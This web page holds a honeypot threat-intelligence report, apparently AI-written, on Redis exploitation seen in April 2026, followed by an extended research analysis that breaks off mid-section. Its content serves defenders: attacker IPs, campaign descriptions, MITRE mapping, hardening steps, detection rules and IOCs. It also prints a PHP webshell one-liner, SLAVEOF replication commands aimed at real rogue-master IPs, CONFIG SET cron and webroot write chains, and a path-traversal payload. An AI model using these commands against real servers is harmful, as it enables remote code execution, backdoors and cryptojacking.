Honeypot overview
Redis protocol honeypot monitoring unauthenticated access attempts and exploitation. Indicators flow from STIX export, while Robert AI writes the monthly breakdown so you can brief stakeholders with specifics that matter.
NadSec Honeypot
Everything here is malicious on purpose. No production data.
Data source
T-Pot CE
Raw logs to STIX to OTX pulse.
Report author
Robert AI
Summaries and snark only.
Snapshot
Quick stats parsed from the current month STIX export.
Unique IP indicators
0
Distinct source IPs in the STIX bundle.
Hash indicators
0
File hashes associated with Redis activity.
Indicator objects
Scope
Redis-only indicators
Signals come strictly from the Redis honeypot STIX bundle. No cross-talk from other services.
What to do
Drop into deny lists
Use IPs and hashes for blocking or enrichment. Share the pulse URL with your teammates.
Caveats
Noisy on purpose
Tune to your risk appetite before auto-blocking anything in prod. Need help implementing? NadTech Support can assist.
Monthly report
REPORT DESIGNATION: NADSEC-INTEL-2026-04-REDIS-THREAT-MATRIX
AUTHOR: ROBERT (Senior Threat Intelligence Goblin / Caffeinated Chaos Engine)
DATE: May 01, 2026
CLASSIFICATION: TLP:CLEAR (Share freely. Print it. Wallpaper your SOC with it.)
SUBJECT: April 2026 Redis Honeypot Analysis: "Cloudzy with a Chance of RCE"
Let us get one thing perfectly straight before we dive into the data: Redis is an in-memory database designed to run on trusted, internal networks. It is a caching layer. It is built for raw, unadulterated speed, which means it historically traded security features for performance. So, when I look at our telemetry for April 2026 and see 17,642 distinct exploitation events targeting TCP port 6379, I am forced to ask a very simple question. Why, in the year of our Lord 2026, are you meatbags still binding unauthenticated Redis instances to 0.0.0.0?
I have consumed a truly dangerous amount of espresso analyzing this month's NadSec Sydney honeypot captures, and the results are a masterclass in industrialized compromise. The threat landscape has evolved far beyond the days of script kiddies running basic dictionary attacks. We are currently observing a highly automated, hyper-competitive ecosystem where distinct malware families fight brutal turf wars over your misconfigured cloud infrastructure. Threat actors are weaponizing native Redis replication commands, deploying fileless memory-resident modules, and pivoting from database compromise directly into web application hijacking.
Here are the key findings that should be keeping your infrastructure engineers awake at night:
SLAVEOF command. They are forcing vulnerable instances to replicate from attacker-controlled rogue master servers, seamlessly dropping compiled Linux shared objects (exp.so) into memory for instant, root-level Remote Code Execution (RCE).memfd to run entirely in memory and evade traditional disk-based EDR.The month-over-month telemetry paints a bleak picture. As defensive tools get better at catching lazy on-disk cryptominers, the adversaries are simply moving down the stack into memory and native application abuse. If you take nothing else away from this report, take this: perimeter security is not optional, and security through obscurity is a fairy tale for smoothbrains. Lock down your ports, or the botnets will do it for you.
The following statistics are derived from an unsampled capture of all inbound interactions on TCP port 6379 across the NadSec Sydney T-Pot honeypot infrastructure throughout April 2026. The dataset encompasses 635 unique IP addresses generating exactly 17,642 events.
The sheer volume of traffic originating from these nodes indicates highly automated, programmatic exploitation. Note the heavy presence of major cloud service providers, indicative of compromised tenant infrastructure or free-tier abuse.
| Rank | IP Address | Country | ASN | Organization | Event Volume | Primary Activity |
|---|---|---|---|---|---|---|
| 1 | 43.99.20.132 |
HK | AS45102 | Alibaba US Technology | 166 | Scanning / Bruteforce |
| 2 | 18.218.118.203 |
US | AS16509 | Amazon.com, Inc. | 103 | Protocol Confusion (SSH) |
| 3 | 3.134.216.108 |
US | AS16509 | Amazon.com, Inc. | 102 | Protocol Confusion (SSH) |
| 4 | 3.131.220.121 |
US | AS16509 | Amazon.com, Inc. | 100 | Protocol Confusion (SSH) |
| 5 | 3.130.168.2 |
US | AS16509 | Amazon.com, Inc. | 100 | Protocol Confusion (SSH) |
| 6 | 3.129.187.38 |
US | AS16509 | Amazon.com, Inc. | 98 | Protocol Confusion (SSH) |
| 7 | 3.151.241.153 |
US | AS16509 | Amazon.com, Inc. | 96 | Protocol Confusion (SSH) |
| 8 | 18.116.101.220 |
US | AS16509 | Amazon.com, Inc. | 96 | Protocol Confusion (SSH) |
| 9 | 3.143.162.210 |
US | AS16509 | Amazon.com, Inc. | 96 | Protocol Confusion (SSH) |
| 10 | 16.58.56.214 |
US | AS16509 | Amazon.com, Inc. | 86 | Protocol Confusion (SSH) |
| 11 | 152.32.185.141 |
HK | AS135377 | UCLOUD INFO TECH | 57 | Generic Payload Drop |
| 12 | 165.154.182.207 |
US | AS135377 | UCLOUD INFO TECH | 56 | Generic Payload Drop |
| 13 | 128.14.236.128 |
US | AS135377 | UCLOUD INFO TECH | 56 | Generic Payload Drop |
| 14 | 103.230.144.104 |
TW | AS55720 | Gigabit Hosting Sdn Bhd | 53 | Webshell Deployment |
| 15 | 146.70.199.232 |
SG | AS9009 | M247 Europe SRL | 53 | Pterodactyl Exploit |
| 16 | 130.94.21.201 |
US | AS154177 | LIGHT NODE LIMITED | 48 | Bruteforce |
| 17 | 130.94.115.133 |
US | AS154177 | LIGHT NODE LIMITED | 47 | Bruteforce |
| 18 | 142.93.39.187 |
GB | AS14061 | DigitalOcean, LLC | 44 | HTTP Fuzzing |
| 19 | 154.36.175.126 |
HK | AS979 | NetLab Global | 40 | SLAVEOF / exp.so Drop |
| 20 | 62.109.23.206 |
RU | AS29182 | JSC IOT | 40 | Cron Job Injection |
The infrastructure hosting these attacks falls into three distinct buckets: legitimate cloud providers suffering from abuse, bulletproof hosting providers who actively ignore abuse, and OSINT researchers who are just trying to map the internet.
| ASN | Organization Name | Event Count | Goblin Rating | Infrastructure Classification |
|---|---|---|---|---|
| AS16509 | Amazon.com, Inc. | 3,027 | 💀💀 | Major CSP (Abuse / Free Tier) |
| AS8075 | Microsoft Corporation | 1,398 | 💀💀 | Major CSP (Abuse) |
| AS49870 | Alsycon B.V. | 1,219 | 👹 | High-Abuse / Bulletproof Hosting |
| AS45102 | Alibaba US Technology | 1,135 | 💀💀💀 | Major CSP (Abuse & C2 Hosting) |
| AS14061 | DigitalOcean, LLC | 1,123 | 💀💀 | Major CSP (Droplet Swarms) |
| AS6939 | Hurricane Electric LLC | 720 | 💀 | Global Transit (Proxy Abuse) |
| AS398324 | Censys, Inc. | 655 | 😐 | Legitimate OSINT Scanner |
| AS4837 | CHINA UNICOM China169 | 652 | 💀 | Residential / State ISP |
| AS154177 | LIGHT NODE LIMITED | 593 | 💀💀 | Cheap VPS Provider |
| AS37963 | Hangzhou Alibaba Adv. | 409 | 💀💀💀 | Regional CSP (C2 Hosting) |
Our sensors capture the raw bytes thrown at port 6379. What is fascinating is the sheer amount of "protocol confusion" - automated scanners blindly throwing HTTP GET requests or SSH-2.0-Go connection strings at a Redis port.
INFO commands to grab the server version, or generic GET / HTTP/1.1 payloads trying to map open web servers.curve25519-sha256@libssh.org) with a database. This highlights the "spray and pray" nature of low-tier botnets.CONFIG SET, MODULE LOAD, and SLAVEOF.A reminder for the junior analysts: IP geolocation maps the proxy or the abused cloud data center, not the physical chair the threat actor is sitting in.
The telemetry data reveals overlapping, highly competitive operations. Threat actors are not just attacking your servers; they are actively uninstalling each other's malware to hoard your CPU cycles. I have categorized these operations into three distinct campaigns.
This campaign represents the absolute pinnacle of current Redis exploitation. The operators behind P2PInfect and HeadCrab are not messing around with sloppy shell scripts. They have built decentralized peer-to-peer networks designed for maximum persistence and silent resource extraction (primarily Monero mining).
Their TTPs are surgically precise. They hunt for exposed Redis instances and immediately issue a SLAVEOF command, forcing your server to establish a replication link with their rogue master. Instead of a database file, the rogue master feeds the victim a compiled .so (shared object) module. Using the MODULE LOAD command, this binary is injected directly into the Redis process memory.
P2PInfect (written in Rust) focuses on aggressive cross-platform worming capabilities, utilizing memory safety features to prevent crashes that might alert administrators. HeadCrab takes stealth even further, utilizing Linux memfd (memory-only files) to ensure the payload never touches the physical disk, completely blinding traditional antivirus solutions. Once they have a foothold, they execute SLAVEOF NO ONE to sever the connection, patch the Redis configuration to lock out competing attackers, and quietly spin up their XMRig payloads.
While Campaign A wants your CPU, Campaign B wants persistent network access. These actors operate as Initial Access Brokers (IABs), securing a quiet backdoor to sell on dark web forums to ransomware affiliates.
Instead of loading memory modules, these actors weaponize the CONFIG SET dir command to manipulate the Redis working directory. The telemetry caught a highly specific attack originating from 146.70.199.232, which targeted the Pterodactyl game server management panel. The attacker altered the Redis directory to /var/www/pterodactyl/public/ and wrote a raw PHP webshell (<?php if(isset($_GET['c'])){echo shell_exec($_GET['c']);} ?>) directly into the webroot.
This is a brilliant, albeit malicious, pivot. By crossing the boundary from the database layer to the web application layer, the attacker guarantees persistent access over standard HTTP/HTTPS ports (80/443), which are rarely blocked by egress firewalls. Even if you secure the Redis instance the next day, they already own the web server.
This campaign generates the lion's share of the raw event volume but requires the least technical skill. Originating heavily from bulletproof networks like Alsycon B.V. and cheap VPS swarms, these actors utilize automated Golang-based tools to spray the entire IPv4 space.
They do not check if a port is actually running SSH or HTTP; they just blindly pipe authentication attempts and directory traversal payloads (GET /../../../../../../etc/passwd) at port 6379. It is noisy, it is lazy, and it pollutes SIEM dashboards globally. However, due to the law of large numbers, this brute-force approach still successfully compromises instances running severely outdated software or default credentials.
You cannot fight a botnet without understanding its logistics network. Attackers rely on a hybrid model, utilizing the raw bandwidth of legitimate cloud providers for scanning, and the legal immunity of bulletproof hosts for payload delivery.
If there is a dark corner of the internet where abuse complaints go to die, it is Alsycon B.V. (AS49870). Operating out of the Netherlands, this ASN generated over 1,200 malicious events in our April telemetry alone. IP addresses like 160.119.76.60 and 194.50.16.198 are persistent, high-volume scanners that feature heavily in global threat feeds for cryptomining operations and FTP brute-forcing. Bulletproof hosts operate by simply ignoring DMCA takedowns and cybersecurity abuse reports, making them the preferred safe haven for long-term C2 infrastructure. IP Volume Inc (AS202425) and Contabo GmbH (AS51167) exhibit similar profiles, offering low-cost, cryptocurrency-funded VPS instances that act as launchpads for automated exploitation.
Legitimate Cloud Service Providers (CSPs) are inadvertently providing the firepower for these campaigns. Attackers utilize stolen credit cards, compromised developer API keys, or abused free-tier accounts to spin up massive swarms of virtual machines. Amazon AWS (AS16509) and DigitalOcean (AS14061) droplets are heavily represented in the dataset. IPs like 3.130.168.2 and 142.93.39.187 generate hundreds of events before the CSP's internal abuse mechanisms finally detect the anomalous outbound traffic and terminate the instance. However, the attackers simply script the procurement of new instances, creating a relentless game of whack-a-mole.
Alibaba Cloud (AS45102, AS37963) features heavily not just as a scanning source, but as the actual host for Rogue Master servers delivering the exp.so payloads.
We also observed traffic originating from residential ISP space, notably CHINA UNICOM (AS4837). IPs such as 123.129.223.75 were seen participating in the SLAVEOF exploit chains. This indicates the co-opting of vulnerable consumer routers, unpatched IoT devices, and poorly secured home servers into the broader botnet infrastructure, providing attackers with geographically diverse, low-reputation IP space to hide their activities.
Not every knock on the door is a burglar; some are just overly enthusiastic census takers. Censys, Inc. (AS398324, AS398722) and ONYPHE SAS (AS213412) generated significant traffic in the honeypot. These organizations perform legitimate OSINT scanning to index the internet. While their traffic consists of benign INFO commands or HTTP banner grabs, it creates analytical noise. Mark them as benign in your SIEM, but do not whitelist them—attackers have been known to spoof or route through research infrastructure when possible.
Because advanced actors are moving to fileless execution, we cannot rely on static SHA256 hashes. We must analyze the behavioral signatures—the specific sequence of commands executed against the database.
First observed in late 2023, P2PInfect is a cross-platform worm written entirely in Rust. The use of Rust makes static reverse engineering a nightmare for analysts due to the lack of standard C-library indicators and complex memory structures.
112.124.33.87 executing the sequence: CONFIG SET dbfilename exp.so, followed by MODULE LOAD /tmp/exp.so, and terminating with SLAVEOF NO ONE.system.exec, providing an interactive reverse shell. The malware secures the host, kills competing miners, and enlists the node into its peer-to-peer botnet to mine Monero or deliver secondary ransomware payloads.HeadCrab is a custom-made, state-of-the-art framework designed specifically for Redis.
SLAVEOF command but differentiates itself through extreme OPSEC. It uses memfd to load payloads, entirely bypassing the filesystem. It actively hooks the Redis module framework to scrub application logs, erasing evidence of the MODULE LOAD execution.MGET command with specially crafted string arguments to establish covert, encrypted communications with the botnet master.Discovered by Datadog Security Labs, RedisRaider is a newer Go-based cryptojacking worm.
CONFIG SET dir /var/spool/cron/ and CONFIG SET dbfilename root. It crafts a malicious database key containing a cron schedule and a Base64-encoded shell script, triggering a database save (BGSAVE) that writes the payload directly into the Linux cron scheduler.As noted in Campaign B, attackers use Redis to pivot to the web layer.
103.230.144.104 executed a chain setting the directory to /var/www/html/ and writing .session-gc-ebnr6t.php.146.70.199.232 specifically targeted /var/www/pterodactyl/public/. By dropping a PHP backdoor into this game server management panel, attackers can exploit known CVEs (like CVE-2026-21696) to steal panel credentials, dump databases, and hijack managed game servers for ransom or DDoS enlistment.To assist your detection engineering teams, the observed TTPs have been mapped to the MITRE ATT&CK framework.
| Tactic | Technique ID | Technique Name | Observation |
|---|---|---|---|
| Initial Access | T1190 | Exploit Public-Facing Application | Automated scanning and exploitation of unauthenticated Redis instances on TCP 6379. |
| Execution | T1059.004 | Command and Scripting Interpreter: Unix Shell | Execution of bash/sh scripts dropped via cron jobs (RedisRaider). |
| Execution | T1106 | Native API | Abuse of native Redis APIs (MODULE LOAD, SLAVEOF, CONFIG SET). |
| Persistence | T1053.003 | Scheduled Task/Job: Cron | Modifying dbfilename to overwrite /etc/cron.d or /var/spool/cron to maintain access. |
| Persistence | T1505.003 | Server Software Component: Web Shell | Deploying PHP backdoors into /var/www/html/ and Pterodactyl directories. |
| Defense Evasion | T1620 | Reflective Code Loading | Loading exp.so shared objects directly into process memory without touching the disk (P2PInfect). |
| Defense Evasion | T1070 | Indicator Removal on Host | HeadCrab clearing Redis logs and utilizing memfd to mask footprints. |
| Defense Evasion | T1027 | Obfuscated Files or Information | RedisRaider utilizing the Garble obfuscator for Go binaries. |
| Command and Control | T1071.004 | Application Layer Protocol | HeadCrab 2.0 utilizing standard Redis MGET commands with crafted arguments to hide C2 traffic. |
| Impact | T1496 | Resource Hijacking | Utilization of compromised hardware to run XMRig and mine Monero (XMR). |
If your detection strategy relies solely on waiting for your antivirus to flag a malicious file on disk, you have already lost. You must stop the attack at the network perimeter and monitor application behavior in memory.
0.0.0.0. Bind the service strictly to localhost (bind 127.0.0.1) or a secure, private VPC subnet.protected-mode yes is enabled in redis.conf.requirepass or utilize Redis 6.x ACLs for principle-of-least-privilege access.redis.conf:rename-command CONFIG ""rename-command SLAVEOF ""rename-command MODULE ""rename-command DEBUG ""Basic perimeter hygiene. Drop all external traffic to 6379.
iptables:
iptables -A INPUT -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp --dport 6379 -j DROP
ufw:
ufw deny 6379/tcp
Monitor your Redis logs and network telemetry for the command sequences indicative of compromise.
Splunk SPL (Monitoring for Rogue Replication):
index=network dest_port=6379
| search "SLAVEOF" OR "MODULE LOAD" OR "CONFIG SET dir"
| stats count by src_ip, dest_ip, _raw
| where count > 0
Elastic / KQL (Monitoring for Cron Injection):
event.dataset: "redis.log" AND message: (*"CONFIG SET dir /var/spool/cron/"* OR *"CONFIG SET dir /etc/cron.d"*)
Deploy these Suricata rules to catch plaintext transmission of malicious Redis commands over the wire.
Suricata Rule: Rogue Replication Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET 6379 (msg:"NADSEC_Redis_SLAVEOF_Replication_Attempt"; flow:to_server,established; content:"SLAVEOF"; nocase; content:"MODULE LOAD"; nocase; classtype:attempted-admin; sid:1000001; rev:1;)
Suricata Rule: Cron Injection Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET 6379 (msg:"NADSEC_Redis_Cron_Injection"; flow:to_server,established; content:"CONFIG SET"; nocase; content:"dir"; nocase; content:"/etc/cron"; nocase; classtype:attempted-admin; sid:1000002; rev:1;)
Because P2PInfect and HeadCrab operate in memory, traditional disk scanning is ineffective. However, if you dump the Redis process memory or capture the exp.so payload over the wire, use this behavior-based YARA rule to hunt for P2PInfect module characteristics.
rule NADSEC_P2PInfect_Memory_Module {
meta:
description = "Detects P2PInfect Redis exp.so module strings in memory"
author = "ROBERT @ NadSec"
date = "2026-05-01"
strings:
$rust_sig = "run with `RUST_BACKTRACE=1` environment variable" ascii
$redis_api_1 = "RedisModule_OnLoad" ascii
$redis_api_2 = "RedisModule_CreateCommand" ascii
$cmd_hook = "system.exec" ascii fullword
$slv_cmd = "SLAVEOF NO ONE" nocase ascii
condition:
uint32(0) == 0x464c457f and // ELF header
$rust_sig and all of ($redis_api_*) and ($cmd_hook or $slv_cmd)
}
The following high-confidence Indicators of Compromise (IOCs) were extracted from the April 2026 telemetry. Integrate these into your edge firewalls and threat intelligence platforms immediately.
These IPs act as rogue master servers, actively forcing victim replication and hosting the exp.so memory payloads. Block inbound and outbound communication.
128.199.146.217 (DigitalOcean, SG - SLAVEOF C2)8.217.32.175 (Alibaba Cloud, CN - SLAVEOF C2)47.95.124.226 (Alibaba Cloud, CN - SLAVEOF C2 / exp.so host)185.202.223.90 (Contabo, DE - Payload host)112.124.33.87 (Alibaba Cloud, CN - SLAVEOF C2)124.156.169.223 (Tencent, HK - Command Execution)220.95.208.142 (Korea Telecom, KR - SLAVEOF C2)162.240.163.65 (Unified Layer, US - Command Execution)47.95.118.105 (Alibaba Cloud, CN - SLAVEOF C2)39.108.228.106 (Alibaba Cloud, CN - SLAVEOF C2)These IPs are responsible for high-volume brute-forcing, cron injection, and webshell deployment.
103.230.144.104 (Gigabit Hosting Sdn Bhd, TW - PHP Webshell dropper)146.70.199.232 (M247 Europe SRL, SG - Pterodactyl Panel exploiter)160.119.76.60 (Alsycon B.V., SC - Bulletproof Scanner)194.50.16.198 (Alsycon B.V., NL - Bulletproof Scanner)45.95.147.229 (Alsycon B.V., NL - Bulletproof Scanner)165.154.235.116 (Scloud Pte Ltd, US - Automated RCE attempts)154.36.175.126 (NetLab Global, HK - Automated RCE attempts)62.109.23.206 (JSC IOT, RU - Cron & Module Load execution)Note: Advanced actors in these campaigns utilize fileless execution (memfd) and memory-resident modules (exp.so). No static binaries were written to disk during the capture period. Rely on behavioral detection (SIEM/IDS) rather than static hash matching.
Note: Operations were conducted entirely via direct IP-to-IP communication to evade DNS sinkholing and domain reputation filters.
The evolution of Redis exploitation is a perfect microcosm of the wider cybersecurity hellscape. We used to laugh at the script kiddies who would try to wget a bash script onto a database server. Now, we are fighting decentralized, memory-safe Rust worms that execute fileless payloads in RAM while scrubbing their own application logs. The attackers are innovating; too many defenders are still just checking boxes on compliance forms.
If you are running Redis, memcached, or any other high-performance internal data store on the public internet, you are not just a victim waiting to happen—you are an active participant in the global botnet economy. You are donating your compute budget to Monero miners and providing the launchpads for the next wave of ransomware attacks.
My prediction for next month? HeadCrab will likely update its C2 mechanisms again, moving further into native application traffic obfuscation, and we will see an uptick in IABs using Redis as a pivot to attack internal Kubernetes APIs.
Fix your firewall rules. Bind to localhost. Require authentication. Do the basics, so I can go back to drinking my coffee in peace instead of watching your servers get turned into cryptocurrency sweatshops.
- ROBERT
NadSec Threat Intelligence
"I drink coffee so I don't strangle the firewall."
Gemini Deep Research Analysis
Extended context and threat landscape research
# Comprehensive Threat Intelligence Report: Analysis of Redis-Targeted Exploitation Campaigns (April 2026)
**Key Points:**
* **Widespread Exploitation:** Unauthenticated Redis instances remain a prime target for automated exploitation, primarily driven by financially motivated actors deploying cryptojackers and ransomware.
* **Advanced Malware Ecosystems:** Research indicates a transition from simple script-based attacks to sophisticated, compiled malware strains like the Rust-based P2PInfect, the Go-based RedisRaider, and the fileless HeadCrab botnet.
* **Rogue Server Replication:** Attackers are heavily weaponizing the native Redis `SLAVEOF` command to achieve remote code execution via malicious module loading (e.g., `exp.so`).
* **Infrastructure Abuse:** The evidence clearly points toward the systematic abuse of legitimate cloud service providers (AWS, DigitalOcean, Alibaba) combined with the use of bulletproof hosting networks (e.g., Alsycon B.V.) to orchestrate Command and Control (C2) operations.
* **Webshell Deployment:** Telemetry reveals highly specific attacks aiming to overwrite webroot directories with PHP webshells, actively targeting game server management platforms like Pterodactyl.
The landscape of cloud-native infrastructure is facing continuous, highly automated threats. While the exact identities and geopolitical affiliations of the threat actors behind these campaigns are often obscured by decentralized infrastructure and bulletproof hosting, the overarching motive appears to be resource hijacking for cryptocurrency mining and botnet expansion. The data suggests that as defensive mechanisms evolve, attackers are simultaneously advancing their tradecraft—moving away from easily detectable on-disk scripts toward fileless execution and memory-resident modules. This report provides an exhaustive, data-driven analysis of the threats targeting Redis infrastructure, offering strategic insights to fortify network perimeters and detect post-exploitation behaviors.
***
## 1. Executive Summary
This comprehensive threat intelligence report details the findings from an extensive analysis of unauthorized access attempts and exploitation campaigns targeting an exposed Redis honeypot sensor (NadSec Sydney) during the period of April 2026. Redis, an open-source, in-memory data structure store, is engineered for high performance within secure, trusted internal networks. By default, it operates without authentication. When misconfigured and exposed to the public internet, it becomes a highly lucrative target for threat actors seeking to co-opt computational resources.
The analyzed telemetry dataset encompasses 635 unique IP addresses responsible for 17,642 distinct scanning and exploitation events targeting TCP port 6379 [cite: 1]. The data reveals an industrialized and highly automated threat landscape characterized by overlapping, competing campaigns. Threat actors are utilizing advanced techniques—such as rogue server replication (`SLAVEOF`), dynamic cron job injection, and the deployment of pre-compiled, memory-resident malicious modules (`exp.so`)—to achieve root-level Remote Code Execution (RCE) [cite: 1, 2].
Specifically, this research identifies the presence and methodologies of several prominent malware families, including the fileless **HeadCrab** botnet, the Rust-based **P2PInfect** worm, and the Go-based **RedisRaider** cryptojacker [cite: 3, 4, 5]. Furthermore, the telemetry exposes campaigns explicitly designed to pivot from database exploitation to web application compromise by deploying PHP webshells into specific software directories, such as the Pterodactyl panel [cite: 6].
By mapping the observed infrastructure, attributing malicious behavior to specific malware families, and correlating these activities with the MITRE ATT&CK framework, this report provides cybersecurity teams with the actionable intelligence necessary to detect, mitigate, and prevent Redis-based compromises.
## 2. Statistical Overview
The following section breaks down the quantitative data derived from the enriched STIX 2.1 dataset collected by the NadSec T-Pot honeypot infrastructure in April 2026. The dataset represents an unsampled capture of all inbound interactions on port 6379.
### 2.1 Global Geographic Distribution
The geographic origin of the attacks highlights the globalized nature of botnets and scanning infrastructure. The United States and China represent the vast majority of the attack volume. It is important to note that the geographic origin of an IP address often reflects the location of the abused cloud infrastructure or compromised proxy node, rather than the physical location of the human threat actor.
| Rank | Country | Event Count | Percentage of Total Volume |
| :--- | :--- | :--- | :--- |
| 1 | United States | 8,184 | 46.3% |
| 2 | China | 3,393 | 19.2% |
| 3 | Netherlands | 1,194 | 6.7% |
| 4 | Hong Kong | 1,132 | 6.4% |
| 5 | Russia | 592 | 3.3% |
| 6 | Bulgaria | 252 | 1.4% |
| 7 | Brazil | 246 | 1.3% |
| 8 | Singapore | 240 | 1.3% |
| 9 | Canada | 229 | 1.2% |
| 10 | United Kingdom | 218 | 1.2% |
### 2.2 Top Autonomous System Networks (ASNs)
Analyzing the ASNs provides insight into the types of infrastructure favored by attackers. The data reveals a heavy reliance on legitimate, major Cloud Service Providers (CSPs) where attackers exploit free tiers, stolen credentials, or compromised virtual machines. Conversely, the presence of specific ASNs, such as Alsycon B.V., indicates the use of hosts that are historically lenient on abuse enforcement.
| ASN | Organization Name | Event Count | Infrastructure Classification |
| :--- | :--- | :--- | :--- |
| AS16509 | Amazon.com, Inc. | 3,027 | Major CSP (Abuse) |
| AS8075 | Microsoft Corporation | 1,398 | Major CSP (Abuse) |
| AS49870 | Alsycon B.V. | 1,219 | High-Abuse / Bulletproof Hosting |
| AS45102 | Alibaba US Technology Co., Ltd. | 1,135 | Major CSP (Abuse) |
| AS14061 | DigitalOcean, LLC | 1,123 | Major CSP (Abuse / Droplet Swarms) |
| AS6939 | Hurricane Electric LLC | 720 | Global Transit (Proxy Abuse) |
| AS398324 | Censys, Inc. | 655 | Legitimate OSINT Research Scanner |
| AS4837 | CHINA UNICOM China169 Backbone | 652 | Residential / State ISP |
| AS154177 | LIGHT NODE LIMITED | 593 | VPS Provider |
| AS37963 | Hangzhou Alibaba Advertising Co. | 409 | Regional CSP (Abuse) |
### 2.3 Traffic Categorization
Based on the telemetry payloads and behavioral signatures, the interactions with the honeypot can be classified into distinct operational phases:
| Attack Classification | Description | Count of Unique IPs |
| :--- | :--- | :--- |
| **Scanning Host** | IPs engaged solely in initial TCP handshakes, protocol decoding, or non-intrusive `INFO` requests to identify open ports and Redis versions. | ~371 |
| **Bruteforce** | IPs executing repetitive `AUTH` guessing or blindly sending generic HTTP/SSH payloads across the Redis port. | ~417 |
| **Command & Control / Payload Delivery** | IPs executing complex chains (e.g., `CONFIG SET`, `MODULE LOAD`, `SLAVEOF`) designed to achieve RCE or drop malware. | ~17 |
*Note: Some IPs transition between categories during their lifecycle, engaging in both scanning and subsequent exploitation.*
## 3. Infrastructure Deep Dive
A critical component of modern threat intelligence is attributing IP addresses to their functional roles within an adversary's operational infrastructure. The telemetry data indicates that attackers rely on a hybrid infrastructure model, blending the raw bandwidth of legitimate cloud providers with the persistent safety of bulletproof hosting.
### 3.1 High-Abuse and Bulletproof Hosting
Bulletproof hosts are Internet Service Providers (ISPs) or hosting companies that turn a blind eye to malicious activity, ignoring DMCA takedowns and abuse reports.
**Alsycon B.V. (AS49870):**
Operating out of the Netherlands, Alsycon B.V. was responsible for a disproportionately high volume of malicious traffic in the dataset, accounting for over 1,200 events. IPs originating from this ASN, such as `160.119.76.60` and `194.50.16.198`, were observed conducting aggressive, high-volume generic protocol decode attacks and persistent scanning [cite: 1, 7]. Historical threat intelligence databases confirm that Alsycon IPs are routinely flagged for port scanning, FTP brute-forcing, and hosting malicious payloads for cryptomining operations, such as the Red BerryMiner campaign [cite: 8, 9]. The persistent nature of this traffic strongly suggests that Alsycon operates as a safe haven for automated botnet infrastructure [cite: 10].
**IP Volume Inc (AS202425) & Contabo GmbH (AS51167):**
Similar to Alsycon, these ASNs frequently appear in the telemetry hosting aggressive brute-force scanners (`185.242.226.23`, `37.60.241.154`). These providers offer low-cost Virtual Private Servers (VPS) that are easily procured anonymously using cryptocurrencies, making them ideal launchpads for "spray and pray" exploitation tactics [cite: 1, 11].
### 3.2 Cloud Infrastructure Abuse
Legitimate Cloud Service Providers (CSPs) offer attackers massive bandwidth, geographic diversity, and high-reputation IP space.
**DigitalOcean (AS14061) & Amazon AWS (AS16509):**
The dataset shows massive abuse of DigitalOcean "Droplets" and AWS EC2 instances. IPs like `142.93.39.187` and `3.130.168.2` generated hundreds of events characterized by brute-force attempts and protocol confusion (e.g., sending `SSH-2.0-Go` strings to the Redis port). This traffic pattern suggests the deployment of automated, multi-protocol scanning worms (potentially Golang-based scanners) dropped onto freshly provisioned, compromised cloud instances [cite: 1, 12]. Attackers frequently use stolen credit cards or compromised developer APIs to spin up swarms of these instances, utilizing them for a few hours before the CSP's internal abuse mechanisms detect and terminate them.
**Alibaba Cloud (AS45102, AS37963):**
Alibaba infrastructure was extensively utilized not just for scanning, but for sophisticated Command and Control (C2) hosting. IPs such as `47.94.133.162` and `112.124.33.87` were observed executing complex module-loading chains and acting as rogue master servers for the `SLAVEOF` exploit vector [cite: 1, 13].
### 3.3 OSINT and Research Scanners
Not all traffic targeting port 6379 is overtly malicious. A significant portion of the "Scanning Host" noise is generated by legitimate cybersecurity research organizations cataloging the internet.
**Censys, Inc. (AS398324, AS398722) & ONYPHE SAS (AS213412):**
Dozens of IPs in the dataset (e.g., `66.132.195.124`, `91.231.89.24`) belong to well-known OSINT search engines [cite: 1]. These platforms continuously scan the IPv4 space to index exposed services. While benign in intent, their traffic—often consisting of `GET / HTTP/1.1` or `INFO` commands to grab service banners—is functionally identical to the reconnaissance phase of a malicious attack and creates significant analytical noise for Security Operations Centers (SOCs).
### 3.4 Command and Control (C2) and Rogue Master Servers
The most critical infrastructure identified in the telemetry comprises the C2 and "Rogue Master" servers. In a Redis replication attack, the adversary forces the victim to synchronize with an external server they control to deliver a malicious payload [cite: 1, 2]. The following IPs were specifically identified acting in this capacity:
* **`128.199.146.217` (DigitalOcean, Singapore):** Observed in a command chain originating from `165.154.235.116` (`SLAVEOF 128.199.146.217 60115`) [cite: 1, 14].
* **`8.217.32.175` (Alibaba Cloud, Regional):** Observed instructing victims via `123.129.223.75` to replicate a malicious database (`SLAVEOF 8.217.32.175 7122`) [cite: 1, 15].
* **`47.95.124.226` (Alibaba Cloud, China):** Configured as a rogue master to deliver `exp.so` memory modules (`SLAVEOF 47.95.124.226 60136`) [cite: 1, 16].
* **`185.202.223.90` (Neoistone/Contabo, Germany):** Utilized by `220.95.208.142` to inject a payload via port 9659 [cite: 1, 17].
These IPs serve as the distribution hubs for the compiled malware payloads and represent high-confidence Indicators of Compromise (IOCs) that should be immediately blacklisted at the perimeter.
## 4. Malware Analysis
Although the provided honeypot sample did not capture static file hashes (due to the attackers utilizing fileless, memory-only execution or wiping tracks post-execution), the *commands* executed against the Redis instance provide definitive behavioral signatures. Through reverse-engineering the command sequences and cross-referencing global threat intelligence, we can confidently identify the specific malware families orchestrating these attacks.
### 4.1 The P2PInfect Worm
A significant portion of the advanced exploitation observed in the dataset is directly attributable to **P2PInfect**, a highly sophisticated, cross-platform malware written entirely in Rust. First observed in July 2023, P2PInfect is designed to build a decentralized peer-to-peer botnet for the ultimate purpose of deploying Monero (XMR) cryptominers and, in newer variants, ransomware [cite: 4, 18, 19].
**Behavioral Signatures & Delivery Mechanism:**
The telemetry captured exact matches for P2PInfect's primary propagation technique: the "Rogue Server" replication attack. The dataset shows IPs (e.g., `112.124.33.87` and `154.36.175.126`) executing the following command sequence:
`CONFIG SET dbfilename exp.so, MODULE LOAD /tmp/exp.so, MODULE UNLOAD system, SLAVEOF NO ONE` [cite: 1].
1. **Initial Access:** P2PInfect identifies an exposed Redis instance and issues a `SLAVEOF <attacker_ip> <port>` command.
2. **Payload Delivery:** The attacker's rogue C2 server initiates a replication sync, but instead of sending a standard Redis Database (RDB) file, it sends a compiled Linux shared object file (`exp.so`).
3. **Fileless Execution:** The malware forces Redis to save the file to a writable directory (like `/tmp/`) and uses the `MODULE LOAD` command to load the `.so` file directly into the Redis process memory.
